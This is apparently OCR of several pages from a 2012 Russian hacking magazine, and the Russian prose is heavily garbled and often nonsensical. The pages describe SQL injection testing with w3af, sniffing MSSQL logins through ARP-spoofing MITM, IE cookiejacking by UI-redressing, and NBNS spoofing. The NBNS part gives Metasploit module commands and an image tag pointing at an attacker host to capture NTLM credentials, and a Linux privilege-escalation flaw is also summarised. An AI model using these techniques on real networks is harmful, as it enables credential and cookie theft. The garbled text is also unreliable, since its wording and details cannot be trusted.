РУЧНОЕ ТЕСТИРОВАНИЕ Отправить НТТР-заnрос на нормальной операционной системе допускается

на конце концов,

-

sqlmap

[sqlmap.sourceforge.netl, вделанный во wЗaf.

вместе с через множества способов: Telпet,

~

cURL, Wget, Python + urll ib,

:1- выбирай, ч т касательно пуще соответственно душе. В wЗaf к сего

предусмотрены специальные удобные инструменты. П ослать пачку однотипных НТТР-запросов от разными значениями одного с пара­

метров? Пожалуйста! Генерировать соответствующие токены можно на томище но Pythoп. С через редактора НТТР - запросов, во котором есть пусть даже простая п одеветка НТТ Р - синтаксиса, дозволительно отправлять одиночныезапросы . Ч астовозникаетнеобходимостьвыполнить

Пол у ча е мш е лл че р ез S QL-инъекцию

гаммирование который-нибудь строки во

URL не так — не то нетрудно высчитать МО5сумму. Конечно, дозволено бегло накопить «echo -п "admin" 0 md5sum>>

:1 Как твоя милость сейчас дога­

во консоли, так проэксплуатировать на сего вделанный шифровальщик немно­

Бинго! Обнаружена классическая SQ L-инъекция .

го удобнее. П ри раскрутке дежурный безотчетный SQL-инъекции животрепещуще

дал не без; ваш покорнейший слуга , эт что касается з апускаются всё те а плагины, которые твоя милость выбираешь возле

распознавать посреди внешне ответы веб-сервера , с целью а тебе несомненно

об ычном ск анировании.

пригодится замонтированный

diff.

Для поиска «слепых>> из кулей в свою очередь вкушать специальные плагины. Вы­

Ну равно наконец, коли твоя милость « вайтхат >> либо про­

сто заседатель безопасности, ведь заказчику пентеста следует в области казать, во вкусе

ключим мораль ошибок на настройках РНР равно попробуем задетектить т через

«работает»уязвимост~используявозможностьзкспортазапросов

ж е ба г, так сделано вслепую. С через НТТР-редактора посылаем пару

на форматы

з апросов ко нашему веб-приложению: /useг-info.php?id=1 равным образом /useг-info.

Python. Иными словами , позволяется сказать: «От­ на жмите .. Сабмит " равно смотрите, на правах появляется

HTML, AJAX

кройте вишь эту форму,

да

p h p? id=1 % 0Ы , а а там передаем р езультаты средству ради сравнения тра нз акций. В результате рядом вып в рассуждении лн е нии SQL-зaпpoca срабатывает

JS-сообщение ... >>

пр ос тейшее алгебраическое выражение, равным образом наш брат получаем двуха разных

Р ассмотрим типич н ый изложение использования сих инструмен­ тов . Запускаем прокси равно шаримея по части да не без; следуемом у веб-приложению

отв е та [информация дл ваш покорный слуга р а зны х польз в рассуждении вателей!. Дальнейшим медленный

[не забываем привнести проксирование трафика во светильник у зереl.

м ож ет вместе с преступник всё та а э кс пл у атация от для ули .

На вкладке Histoгy видим отображаемый на реальном времени НТТР­

OUTRO

движение средь браузером равным образом сервером. В случае из побольше мощным при­

ложением, на выдержку чатом , транзакций короче куда больше.

WЗ af- сие действительн насчёт всемогущий фреймворк к тычина т ирования

В таковой ситуации вроде воспрещается с руки хорэ атомный фильтр : из его

б ез оп из же от ти веб-приложений . Рас вместе с казывать относительно нем дозволено растянуто ,

через можно, для примеру, извлекать лишь только транзакции из такими за­

п относительно этом у ваш покорнейший слуга ставил накануне не без; насчёт б насчёт й задач у по мнению показывать его на действии.

просами, которые содержат габариты во строке << Запросы>> равно для кото­

Важно, что такое? сие безграмотный прос т по части случающийся автосканер безопасности, а то есть

рые был получен 0хх-й ответ.

фр е ймворк, большое сумма дополнений тому доказательство. К тому ж е к человека , в базовом у ровне знающего веб равно

Вернемся ко нашему приложению. Во период навигации в области нему

Python,

замечаем, почто подле наведении для аватар пользователя появляется

безвыгодный со ставиттруда присчитать недостающий функционал иначе проверку.

всплывающее «окно>> не без; информацией об этом пользователе. Эта

К не без; тати , что да любому свободному проекту, wЗaf нужны новые раз­

извещение выдается во результате как всегда го АJАХ-запроса ко

ра б отчики, тестировщики да прямо-таки активные пользователи. Кого

/useг-info.php?id=1, что такое? различимо во истории запросов . Давай протести ру­

з т относительно з аинтересовало, услуга nожаловать во подобающий наличность

ем настоящий скрипт получи уязвимости. Для нашего запроса во кадастр выбираем

рас из ылки [ wЗ af . souгce f oгge . ne t l либо получи IRС-канал #wЗaf на яма

«Audit

гequest

with ... >>- нас

интересует, лакомиться ли с годами SQ L-инъекция .

Fг e enode. ::х::

ld:47

ld: 06

LАутентификация J

~~-----..

[ Сбор ссылок

GЕТ http :/Jloca.lhost /u ser - i n fo .~p 0id-1 НТТР/1.1

~

Accept -l.angu•: en-us,en;q-e.s Accept-encodi ng: identity Keep-alive : 015 Accept : text/htlll, арр lication/xhtlll+XIIl, арр licat ion/XIIl: q..e. 0

user-agent : Нozilla/S.e (Xll; Linux i686; rv:2.&.1) Gecko/Z81 Accept -charset : IS0-8859 - l, ut f -8; q-e. 0, • ;q-e. 0 Нost: localtюst

Refe re r: http://localhosttindex.php Cookie: PНPS ESSI D-гf 0vdbs j ist7is3j6 rlc3p462S

Proxy- connect i on; keep- а li ve

~GЕТ h t tp ://loc al ho s t t u ser- in fo. php 0id· 0~Bl НПР/ 0 . 0

Accept- l anguage: en-us,en;q-e.S Accept-encoding : identity Keep-alive: 015 Accept: text/ht.l,application/xhtii\+XIIl ,application/xlll ;q..e. 0 , .-, . ;q-8.8 User-agent: t10zilla/S .8 (Xll ; Linux iб86; rv:2.8. 0) Gecko/28118438 Firef o Accept -charset: IS0-88S9· 0,utf -S; q-8. 0, • ;q-e. 0 Нost: localhost Referer : http://l ocalhos t /index. php Cookie: PНPS ESS I D• rf 0vdbs j ist7 is З jбrlcЗp462S Proxy-connection: keep-alive <style>

<style>

"' (height:

"'( height :

ерх; Ьorde r : 0рх; Ьorder-top:

</ style> <tаЫе Ьo rde r- " 0 "

<tа Ые Ьогdег-· е· от е\ \sp<~c i ng- " S " c\ass-· userТaЫe">

~ <1: Г><t d> Fi rs t natlf!: </td><td>Jaii'IE!s</td></t r> <t r><td>Las t na~~e : </ td><td>Bond</ td></ t r> <tr><td colspan• "2"><hr />1 like Vodka ... shaken not stirr <t r><td co\s an•"2 "><hr /><а href• "/IIIE!ssages .p_h ?to•jai'IE!s </t r> </table>

0Sellext lo compare J

ХАКЕР

03 / 058/ 00 02

Ipx solid gray;

0

0 </sty\ e>

Модель работы род да болтовня для ого ск анера уязвимостей веб - прило ж ени й

ерх;

Ьorder: ерх; Ьorder-top:

l px solid gray;

~

cell spacing•" S" cla s s-~ us e rТaЫ e "> <tr><td>Firstnane: </td><td>A\isa</td></ t r> <1: r><td>Las tnaii'IE! : </td><td>Se lezneva</td></t r> <tr><td colspan•"2"><hr />Spacegir\1 J! !</td></tr> <tr><td cols an•"2"><hr /><а href• " /IIE!ssages . ~h~7to-alisa " >Send Priva </ t r> </tabl e>

[<lo::J o12

Утилита да з контингент а wЗ af на сравнения НТТР-т ранз акций

051


ВЭЛОМ/ЕАSУ НАСК

Лёша «GreenDog » Тюри н, Digital Security ltwitter.com/antyurinl

ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В

MSSQL

Ef.3Jf..i!f.·l ъ--

Microsoft SQL server- сие

одна с самых распространенных СУБД.

0.

Шифрование общепонятно , да отключено:

ENCRYPT_O FF- ОхОО. ENCRYPT_ON - Ох01. ENCRYPT_NOT_S UP - Ox02 .

Шифрование приемлемо да включено:

З.

Шифрование недоступно:

Как равным образом многие некоторые продукты питания

Microsoft, SQL server предлагает два вида аутентификации : integrated [sign-on], так кушать аутенти­ фикацию п по части виндовой у ч етной записи, равно native, так кушать классиче­

0.

Шифрование требуется: ENCRYPT_REQ-OxOЗ.

скую, за логину равно движение ролю. Оба способа используются кончено

тря бери название, шифровка около таком значе нии используется,

часто.

же всего лишь ради процесса . А видишь эпизодически целесообразно

По дефопту данные, передаваемые объединение сети, фактически

зашифровка далеко не используется совсем. Таким образом, наш брат в корне

безвыгодный шифруются. Если точнее, ведь шифруется судебное дело аутентифи­

можем осущест крутить классическую МiТМ-атаку и, подменив сведения

кации пользователя, а самочки данные- нет. Конечно, в целях атаки

только только что на одном батман кете, вполне отключить криптооперация

сего было бы достаточно. Зачем нам логин равно движение роль, кабы автор

да отснифать аутентификационные данные.

Давай рассмотрим двум ее особенности.

0.

0. 2.

г

По дефопту устанавливается сила

ENCRYPT_O FF.

Несмо­

ENCRYPT_NOT_SUP,

Кстати, виновник сего исследования довел всё перед логического

можем возьми лету сменять представление не так — не то получитьданные , общей сложности лишь только

устроив arp-spoofiпg средь сервером да клиентом? Затем, что-то сие

конца - создал устройство ради

малограмотный самое ради стое профессия - заменять как бы бери лету. Поэтом у по­

после нас равно сделает. Только , думаю, з десь имеет смысл затронуть одну особен­

Metasploit Framework,

какой всё

ность. В описываемом случае узел никак не меняет сведения получай полет у,

пытаемся вытащитьлогин да пароль.

а поднимает ТСР-порт, равным образом всего не без; него эмпирика редиректятся

Не где-то искони некий подо ником fOrki изучил настоящий задание [!J.i.LЬ'L s8g07r l. Посмотрим, почто но симпатия выудил. Дл ваш покорнейший слуга азбука то, почто дан­ ные MSSQL передаются во конфигурация т е Tabular DataStream protocol

получи и распишись MSSQL-cepвep следовать число отсчетов до этих пор одного соединения, созданного уже атакующим, что, тем безвыгодный менее, неграмотный создает особых проблем. Всё, в чем дело?

требуется, - з т по части распустить редирект трафика, приходящего

[ bit . ly/z З oVPR I. Н в рассуждении самолично текущий пр отокол безграмотный поддерживает шифрова­

для хост атакующего потом arp-spoofing-aтaки, получи заслуженный

ние . Как а так? Откуда зашифрованные п акеты авторизации?

ограниченный порт. Но да эту из-за дачу

После непродолжител ьны х мучений не без;

во личный часть нищенский shеll-скрипт.

Wireshark fOrki

обнаружил

автоматизировал, добавив

fOrki

хватит интересную вещь: на шифрования в этом месте использу­

ется обыдённый

SSL [с самоподписанным сертификатом], который TDS . Нестандартное решение. Но сие безграмотный приближенно

-----

-

- -

--

-

-

~--------

работает вн утри

важно. Самое интересное- сие наладка ТDS-соединения, так называемого пакета

PRELOGIN . Он

-

-----

задает разнообразные

настройки равно на томишко числе указывает, достаточно ли использоваться шифрование. За криптооперация отвечает поле рое может брать сле д ующие значения:

052

- - -

ENCRYPTION,

кото­

------------

-

-

- - - -- - - - --

Выбор метода бери основании флагов, установленных у клиента равно сервера

ХАКЕР

03/158/2012


EASY

УГНАТЬ КУКИСЫ С ПОМОЩЬЮ

UI-REDRESSING

НАСК

......... ·Jйи г

В декабрьском номере][ автор сих строк познакомились со ёбаный вещью, в духе

clickjacking.

по части -·

Сrатья была очен ь полезной, хотя компилятор безвыгодный упомянул об

одном замечательном трике. На самом деле номинация

т

~ Р - ~ - G~ ·

Adcms iQ c:'iOocunert:sns.ttnat~

clickjacking ui-

отнюдь не нисколько согласно правилам отражает сила атаки, равным образом ми кажется, сколько

сие сильнее правильное nонятие. И техническое оснащение , которую ваш покорный слуга

redressing -

.,_

опи ш у ниже,- самое яркое т ому подтверждение.

Итак , n озволь вообразить тебе технике рассказал

cookiejacking. Впервые об этом Rosario Valotta бери HITB во Амстердаме во 0011

0iS9l003 .Z<19775128.132514ИЭ9 .132 . account.в .9CJ09le. соа/ >600

году. Потенциал техники огромен- nросто до от тавь , ась? из ее по­

088086656

мощью позволительно nо хи тить куки с люб в отношении го балка та , хоть с защищенно­

ll3080 0SS Z

00191238

го НТТРS-протоколом! Однако на этом месте снедать небольшее усечение :

работает симпатия токмо на

в рассуждении

D

IE !но зато вот всех версиях! . Теперь дайте

Во-первых, дьявол использовал

IE.

0-day,

которая перевода нет умереть и далеко не встать всех

С виду сие безграмотный такая уже равно от трашная дырка, а затем у ее

неграмотный больше всего стремились пропатчить. Как твоя милость еще знаешь, во

st..edDotunerts

~ Мy((ЩIII:et"

_,;j...,__."""

посмотрим, зачем а п редлагает нам оный И Б-специалист.

версиях

.....- .

IE

Об х од кр осс- зон только й политики равным образом ход ко локальным кукисам изо зоны инет

очищать

узлы. В разных зонах действуют различные настройки безопасности.

Rosa rio сие мячик! во другой !сетка!. Под мячик да мы не без; тобой прячем отечественный iframe из кукисам и, а для самом

Н аn ри мер, описанная сверх автоматиче ска моя особа NТLМ-а утентфикация

сайте создаем обрабатыватель ради переносимых данных. Н насчёт да сие сызнова

такая фича, наравне разобщение получай зоны:

д ейст вует дл автор этих строк уз ловля зоны

lntranet

lnternet, lntranet,

доверенные

да выше. Вот сnисок зон, отсо­

- перестановить единовластно штука !в первообраз е

невыгодный всё . Нашему

iframe

я добавляем черточка

scrollspeed

из большим

значением. Это нельзя не к того, с тем клик, совершаемый

ртированных на nорядке уменьшения привилегий:

пользователем, превращал ся на относительно перацию отделения после вычисление само­

стоятельного перемещения lпроскролливанияl

Local Machine Zone Local Intranet Zone Trusted Sites Zone Internet Zone Restricted Sites Zone

iframe изо самого

верха во самы й низ. Таки м образом, получается, в чем дело? юзер во время группа для самом деле выделяет слова в мячик во корзину, перемещает сие т подтекстовка

iframe, а перемещая drag & dгор'ом, во итоге пере­

давая машинопись хакеру. Возможно, в чем дело? сверху словах всё сие важно отнюдь не очень понятно, так равно как токмо твоя милость посмотришь видео нате сайте

Rosario Valotta

С без п воздушный ас н ос т ью равно зонами связан единаче сам момент- инструкция

I Ьit .l y/iN xvT Ь) , ведь одновременно поймешь логику метода и, во частности, техни­

кросс-зон ног что касается взаимодействия. Согласно самому общему прави­

ки сопtепt extractioп, пусть даже даже если твоя милость неграмотный наслышан от

от побольше привил егированной . Та ким образом, требование стих

<iframe

JavaScript.

Думаю, что такое? сегодня проститутка мысль атаки ясна . Однако у нее очищать

лу, ме н ее привил егирован н а ваш покорнейший слуга зо получай н е может взаимоде йствова ть

порядком нюансов. Во-первы х, сия наскок работает в всех ОС

кук и. Таким образом, сверху стра книзу у сайта зоны сеть дозволено

Windows, аюшки? равным образом создает проблему :1. Файлы кукисов на ХР да в Vista/7 лежат во разных местах . Для ХР сие C: //Documents and Settings/%user_name%/Cookies, а для того больше новых версий винды -C: /Users/% user_name %/AppData/Roaming/Microsoft/Wi ndows/ Cookies. Тем безграмотный менее, э т а « дело » решается стоит просто,

встав ить со ожеледь ую щий фрейм:

тогда подавляющая браузеров отправ л яют на каждом вслед за пр осе заголо­

src="file: // c :/boot . ini " >

со страницы зоны интернетприведет

для ошибке дост у па. Уязви мость

0-day

состоит на том, в чем дело? кросс-зонная стратегия

малограмотный действует про оnре д елен ны х файлов, а то есть пользу кого файлов

вок User-Ageпt, какой бог не раз охватывает на себя равным образом версию ОС.

<iframe src="file :///C: // Documents and Settings / %user_name%/Cookies " > </iframe>

Кроме того, про опре дел ения версии ОС дозволяется попользоваться тем же

JavaScript.

Во-вторых, что твоя милость , мы д умаю, заметил , нам делать нечего

нюхать прозвание пользо вателя получай его компьютере, да сие главная про­

Здесь % user_ пame % - сие название пользователя на ОС. Куки а

блема. Для ее решения не запрещается сделать попытку убедить пользователя

у каж дог что до п по отношению ль зователя свои, п оэ ведь му хра нят ся они во личных п ап­

присоединиться сообразно протоколу

ках . Пр равным образом мер, иллюстрирующий произнесение кукисов

передает прозвание пользователя на равных условиях вместе с другими полями. Дл моя особа сего

Google,

твоя милость сможешь

SMB.

Пр да подключении за н ему давальщик

получай ядовитую страни ц у должно прибросить вишь экой минимальный

уви подевать сверху скриншоте.

Во-вторых , за исключением 0 -d тю-тю - бага, либреттист использовал специальную

extraction lпредстав ­ лена П олом Стоуном для BlackHat Europe - 0010, goo.g i/ZBYNw l. Зачем? Хо тя ты да я да подгрузили на iframe обложка не без; кукисам и, все

кoд:<img

технику clickjackiпg·a по-под названием conteпt

src=" \\attac ker.host.com\ any . jpg" ></ img >.

Конечно, уже потребуется водрузить отделочник запросов

получи

045

порт, а по прошествии времени распустить его связь из wеЬ ­

сервером. Как видишь, переданный путь несложно шикарен! Однако

почерпнуть д ос т у п для данны м во н ем ты да я никак не можем. Здесь д ействует

внутренние резервы е г в отношении использования чаще только огра н ичивает филь­

кросс-д омен ная стратегия , однако выше- сайт находится около во сети,

трация такого трафика возьми сетевых устройствах . К тому а з д есь

а на

встает покамест одна проблема. На дворе уж весна-красна 0012-го, а

ifram e у

нас сидит

localhost

пользователя.

Суть этой специальной т ех ники довольно проста. Все совре ­ менн ы е браузеры поддерживают

drag & drop,

из п омощью которого

пофиксила у язвимость на

Microsoft

IE

Microsoft

вновь во начале осени 0011-го. Кроме того,

внесла изменения на обозначение кукисов на файловой

юзер может свести факты из касательно дног относительно сайта нате др угой .

системе. Теперь их названия лишились п относительно н ятного удобочи т аемого

Таким об ра зом, невращение е р , по мнению сут равным образом , копирует данны е на что до дн ом месте

вида user_пa meradomaiп[couпter].txt равно со т аль похожи бери буквенно­

да вставляет во другое . Кросс -дом е нным п олитикам з д есь прицепиться

цифровые рандамы видать 07ТVLB D W.txt. П оэтому устремиться ко ним

безграмотный для чему. Так вот, сопtепt extractioп - это, элементарнее говоря , небольшую толику

напрямую эдак не мудрствуя лукаво поуже малограмотный половая принадлежность учи тся. Впрочем, в соответствии с статистике,

профанированный

беда малое наличность поль зователей рано обновляет

drag & drop. Заманив

получи ехидный clickjackiпg-caйт

нашу жертву, наш брат предлагаем ей, например, потренькать во игру. Ее идея

ХАКЕР

03/158/ 00 02

от вои браузеры, особенно кабы выступление так тому и быть об

IE.

053


ВЗЛОМ/ЕАSУ НАСК

СОБРАТЬ ИНФОРМАЦИЮ РЕШЕНИЕ

SkiJJ Tracino Framework

Сбор информа ц ии яв л яется что касается д ним с важнейших этапов возле про­

;\ ' Ift'(' '•\ , 0 0 \

l

J(r~>r

,J 0'l tlll , ' ' , о..; 0'1,

.. t l

"it .._

ведении ауДита без п аснос т да lну иначе говоря атаки). Ведь нам необходимо найти самое слабое поприще да в рассуждении сего попробовать захапать вследствие него всю систему. Но на какого хрена иска т ь запутанный путь, коли самым слабым местом любой, ажно самой защищенной системы является чело­ век? Ты безусловно знаешь об существовании эдакий замечательной

DNS command Une

вещи, во вкусе социальная инженерия. Е е действенность напрямую

***'*

WeЬsfte

зависит ото доступной информации насчёт человеке, оттого тысячи

*** IPNelghЬors

специалистов равным образом проводят разные исследования бери эту тему.

***,

Однако во России такого типа т ен д енции все еще который малограмотный наблюдается, что-то около

Spamllsts

***•

вроде наши пользователи си д ваш покорный слуга т на основном всего только во Одноклассниках

MaШngllsts

да В Контак т е, д а равно для ц есс информатизации до этих пор попросту отнюдь не доше л

***

DNS lnformetion Gathering command line • Flen:e Domllln scan i:J

****; **** • DNSEnumtooi GI ***i • S dlg ~ns.domaln .com domaln.com AXFR ***

• The Н.rvester comm.1nd llne tool Q

Q

Machinespeclflc

перед большинства ведомст на . В любом случае аз многогрешный думаю, что-то тебя за­

интересует примечание

lntorm•tlon

tools

***;

makensi .es/stf. Автор этой страницы отнюдь не поле­

нился скопить на одном месте безвыгодный плохую коллекцию всевозможных онлайн-сервисов, которые могут прийтись кстати тебе во процессе взлома alias пентеста, ради произвести всю необходимую информа­ цию на правах насчёт человеке, круглым счетом равно по отношению всей подопытной системе.

О nреде nя ем nлаги ны

WordP res s

НАЙТИ АЛЬТЕРНАТИВУ DNS И ПРОСПУФИТЬ NETBIOS

li•iaf..i!!f.ll т ·лw т

е со ли во файле кто в отсутствии nри вязок, производит задание для D NS - cepвepy. За ­ Всем нам известно, что такое? чтобы определения IР-адресов по мнению именам

те м

используется учет

Здесь годится уточнить, что-то

докука относительно безопасности !тогд а существовали побольше важные зада­

NetBIOS Name Seгvice. NetBIOS входит во Windows сообразно дефолту, а NetBIOS Name Seгvice INBNSI- сие оный а протокол, всего-навсего

чи), отчего на нынешнее сезон во нем лакомиться много недостатков

предназначен дьявол в целях установки соответствия в обществе NеtВIОS­

не без; точки зрения безопасности . Однако в смену ему отлично

именами равным образом IР - адресами. В процессеработы нынешний соглашение либо

ONS.

Протокол проектировался сверх особой

DNSS EC,

Windows

использует такую штуку, на правах

да пишущий эти строки надеюсь, что-нибудь си т уа ц ия изменится во лучшую сторону. Сами не­

использует индивидуальный WINS-cepвepa, либо отправляет широко­

достатки

пророческий интерпелляция на невод !думается, пока что задумка атаки понятна).

DNS

сугубо здорово проявляются во локальных сетях,

Но вернемся ко уже одному важному моменту- D NS-зanpocy

особенно неравно наша сестра можем прово д ить атаки в виде aгp-poisoning, позволяющие п росматривать да мо д ифицировать трафик, которым

ко серверу. Если сервер ответит пользова т елю, ведь вслед за п рос до

обме н иваются жер т ва равно се рв е р . Н что до д авай предположим, ч т в рассуждении

еще малограмотный хорош отправлен . А как бы а DNS-cepвepy н е ответи т ь, yes л да

NBNS

в области каким-то п ричинам всё э т что до нам малограмотный д оступно, и так автор сих строк равным образом находим­

увлекающий пользователя сайт ХХХ.СО М да м ее т ОN S-за п ись?

ся на одной лока л ке не без; жертвой . П усть, например, во сетке при­

Здесь наша сестра можем применить возможнос т ями современных

сутствует некая

браузеров : поиском изо адресной строки равно подстано на который доменов

005,

да автор сих строк решительно невыгодный хотим, с целью неизвестно кто заметил

нашу хакерскую предприимчивость . Тогд а нам нужно работать тихо,

верхнего уровня

используя только лишь табор д артные внутренние резервы протоколов. Уточню

привыкают внедрять то, почто их интересует, стоймя во а д ресную стро­

l.com,

.гu) . Как именно? Сейчас пользователи

задачу. Нам никуда не денешься захватить куки, передаваемые пользо­

ко у, хотя браузеры никак не издревле могут понять, хочет ли юзер

вателем для метафизичный сайт ХХХ.СОМ. Изначально может пока­

кое-что откопать во поисковике или — или без затей растворить сайт. Е со т ь, конечно,

заться, ась? альтернатива безвыгодный имеет решения, да начинать рассмотрим, каким

определенные паттерны !например, пробелы во адресной строке),

образом ОС

Windows

а несравненно чаще браузерыв первую черед резолвя т титул только лишь

определяет IР-адрес сайта. Первым делом

общественный порядок проверяет статическую привязку

IP ко

упомянутым повыше способом . Что до этот поры интересней, подле отправке

именам, хранящим ­

ся во файле hosts IC : \Windows\System32\dгiveгs\etc\hosts). Д алее,

• FiltEr: J(chs ог No.•

' 1,..

Заnрос

051.

.

08313 . 063879 485 03 . 086589 493 03 . 00'3700 494 03 . 005520 528 04. 05 0488 570 05 . 005637 URL на

...

nros ) and ip.addr

0 Time

0Destnation

0Source ~

DNS-зanpoca ко введенной пользователем строке добав л яется

0 123 2 123 123 123

=

Ejp'ession ... Cleat Арр!у 1 ProtDcol

023 2 123 255 255 255

ONS DNS DNS NBNS NBNS NBNS

lmro

. .. .

Standard query response_. NO such Standard query А makaka. stanoard query response, No such Name query NB МАКАКА<00 > Name query NB МАКАКА<00> Name query NB МАКАКА<00>

nате

nате

браузер е nоро ж дает nачку ра з личны х заnросов к резолва равно мени

ХАКЕР

03/158/2012


EASY

027 128 162 163 185 186 258 259 319

068.190841 368. 027678 423. 072957 423.407005 442.487183 442:734222 666. 050204 666. 081655 727. 067776

092.168.0.101 192. 068. о. 002 192.168.0.101 192. 068.0.102 192. 068. о. 001 192.168.0.102 192.168.0.101 192.168.0.102 192.168.0.101

092.168.0.255 192.168 . 0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255

NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS

02 104 92 104 92 104 92 104 92

Name Name Name Name Name Name Name Name Name

query query query query query query query query query

НАСК

:00> NB ?? response NB 092.168.0.102 NB iiiliiiliiiliiil lliiilll RU<OO> response NB 092.168.0.102 NB .GOOGLE.COM<OO> response NB 092.168.0.102 NB .-RU<OO> response NB 092.168.0.102 NB AASDASD 0188RU<OO>

N B NS- cn yф ан r во д ейст вии

обусловленный суффикс, на результате ась? следственно полное до­

0.

Запускаем : run .

менное прозвание .

Вернемся для краже кукисов. Итак, используя NВNS-спуфинг, автор

Теперь нам никуда не денешься подделать отповедь в NBNS-зanpoc. Для этого нужен Tгansaction

00

можем заместить какой-либо рандомный запрос. Но нам нужны

с NBNS - зanpoca . Но , в качестве кого сейчас было

сказано выше, оный представление чаще всего делов является широковещатель­

кукисы то-то и есть вместе с ХХХ.сот, а оттого автор проворачиваем неболь­

ным, а этак что автор сих строк находимся на праздник но локалке , ведь никаких проблем

шой трюк- поднимаем веб-сервер со страничкой, содержащей

со его получением нет. К нашей радости, для того спуфинга на

потаенный структура !можно заюзать JavaScгipt) , а еще на зто м фрейме

MSF еще

nрисутствует соответственный модуль. Вот краткая элемент дей­

загружаем ХХХ.сот. Однако нам желательно никак не без труда навалить ХХХ .

ствий:

сот, хотя до этого времени равно проделать так, ради браузер далеко не сделал его со через

0.

Загружаем модульдля Net BI OS-cynnингa:

use auxiliary/spoof/

0. 3.

0.

DNS

равным образом начал пускать в ход к поиска только лишь

NBNS.

Очень хоть куда ,

чтоб браузер продолжал счислять просп уф ленный землевладение тем а

nbns/nbns_response. Выставляем регэпс ответов нате требования :

Set REGEX *google*. set spoofip xa.kep.

самостоятельно ым доменом, по-иному на силу вступят кросс-доменные политики

равным образом никаких кукисо на автор безграмотный увидим. Так по образу указанная методика

Указываем, каковой IР-адрес подставлять:

IP.add r ess.

разресерчивалась на правах в один из дней вот времена написания сего текста, ведь

Зanycкaeм: run.

единственным достойным вариантом стало быть призыв для н есуще­

Теперь сделаю небольшее отступление. Создатель сего моду­

Теперь м что до ж хотя умозаключить общ равно й алгорит м а таки :

ствующему поддомену атакуемого сайта.

ля ITiт целей

Medin) предлагал пускать в ход его целиком для того други х lgoo.gi/Jz2Q9), а не кто иной для того банального сбора NТLМ-хешей.

0. 2.

Поднимаем wеЬ-сервер со легированием входящих запросов

!чтобы соби полки кукисы) равным образом фреймом, ссылающимся бери несуще­

Е сли точнее, в таком случае позднее запуска вышеуказанного модуля через браузе­

ствующий поддомен ХХХ.сот !например , asdasdasd.XXX.coт ) .

ра приходит много запросов, п ричем чаще итого из ась? можно заключить

спуфить короткие имена ! будто тakaka), а малограмотный длинные lтakaka. сот). С учетом логики работы Windows короткие имена причисля­ ются ко зоне интранет !не интернетl). А буква пространство на IE слышно « до­

Устанавли ваем NВNS-сп уфи нг держи по сию пору имена.

0.

Жертва, которая ввела кое-что на адресную строку браузера, спу­ фится за

0.

NBNS да

спуфится в соответствии с

веренной», равным образом на ней действуют стократ не в таковский мере грозные настройки безопасности. К примеру, тогда разрешена автоматическая аутен­ тификация нате сайтах. Таким образом, пишущий сии строки можем лукнуть устройство

0.

редиректится получи хостхакера.

Бра узер автоматом резалвит asdasdasd.XXX.coт, и, опять двадцать пять же,

NBNS.

Браузер что до тправляет кукисы ХХХ.сот для asdasdasd . XXX.coт, то есть возьми хостхаке ра.

на сбора N Т LМ-хешей в соответствии с Н Т Т Р !хотя дозволяется да по части

0.

Загружаем модульдля

SMB): снифинга: use auxiliary/server/

Так им образом, наша сестра можем нахватать кукисы с множества сайтов. Ед инст венн ое сокращение в этом месте на том, чтокукидолжны

capture/http_ntl m. 2. 3.

Страница, идеже бросьте причинять ся запрос:

фигурировать установле ны никак не в ко нкретный связка IХХХ . сот), а получи землевладение

Порт, идеже поднимется веб-сервер :

I . ХХХ.сот) .

set URIPATH . set SRVPORT ве .

ПЕРЕХВАТИТЬ ТРАФИК НА

LOCALHOST ПОД WINDOWS

ы.r.&~tfl г.

Недавно моя персона столкнулся не без; неграмотный возможностью проворонить пробка

настройки

при помощи прокси присутствие системных обращениях для

прокси сверху

-127.0 .0.1. Почему

localhost

системных? Потому, что-нибудь настройки

щиеся прокси , используются большинством ПО в мер,

Python

alias для л у пбзку

IE, касаю­ Windows. Напри­

присутствие использовании uгll i b2 автоматом беретик прокси

г

IE равно .NET fгатеwогk запрещаюттрафику двигаться через localhost равным образом 027.0.0.1 . В IE9 эту проблему посчастливилось постановить

ради отсчет того , что-нибудь на настройках не грех прибрать опцию << никак не исполь­ зовать прокси>>-

<<-localhost».

Решение , на общем-то, оченно простое. Во - первых, позволительно

ОС . Надо отметить, ась? заостреннее только п роблема проявляется,

вонзаться ко сервису за любому

IP

когда-никогда служба поднят не ась? иное сверху внутреннем интерфейсе 0127.0.0.1) и недоступен получи и распишись внешнем 00.0.0.0). В оный в один из дней ми посчастливилось ухлопать

скажем в области адресу

наравне однако они относятся для одному

ее каким-то обходным толком , да а ранее что-л. делает пишущий эти строки наткнулся нате инте­

резолва имен hosts l % windiг%\dгiveгs\etc\hosts) другое прозвище для lo calhost : 027.0.0.1 localhOst .

ресный бекет во благе Eldaг Maгcussen. Он написал, зачем дефолтные

ХАКЕР

03/158/2012

г

027.1.2.3, что-то около

на

027

подсети, помимо первого,

интерфейсу. Во-вторых , дозволено nрописать во файле локального

055


Павлуша Александрович [iv i nsi d e .Ы o g s p ot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Димуля Михайлович

[115612, мол р. К рас н ая звездо ч ка, д . 0[

Обзор эксплоитов В этом интереснейшем обзоре пишущий сии строки рассматри­ ваем свежую слабость во ядрах

Linux,

позво­

ляющую кроме особого труда увеличить услуги

0

Локальное взлобок привипегий на Linux

CVSSV2

0.8

0111111 011 0 011 01111

01 01 0 [AV: L/AC: L/AU:S/C:C/1 :C/A:CI

l:iil'II3] Уязвимость связана со интерфейсом /ргос/<РI 0>/mem [где <PID> идентификатор нужного процессаl, какой-никакой Linux предоставляет

Microsoft Office равным образом Acrobat Reader, а в свой черед ХХЕ-инъекцию на phpMyAdmin.

на честный запи от равным образом на эйдетизм процесса равно чтения изо нее. В ядре версии

Не пропусти!

предварительно от тат касательно чно защищен с неавторизованного доступа вместе с через

на системе, баги на

0.6.39 разработчики у брали директиву #ifdef,

исключающую прямую

заметка во мнема процесса, ввиду сочли, ась? таковой интерфейс уже других ме х анизмов ядра. На самом деле nисать на эйдетизм процесса мож е т каждый пользователь, обладающий достаточными правами.

Как оказалось, сии компетенция проверяютсЯ безграмотный вовсе корректно. В итоге пол у чило вместе с ыо , чтополучилось:вовсехверсияхядра,начинаяс

0.6. 09, лихо у мышл е нник может продвинуть в соответствии с « карьерной лестнице» до рута любого имеющего со аз многогрешный пользователя .

056

ХАКЕР

03/158/20 02


Обзор экс пло итов

цt:J4!·Jii

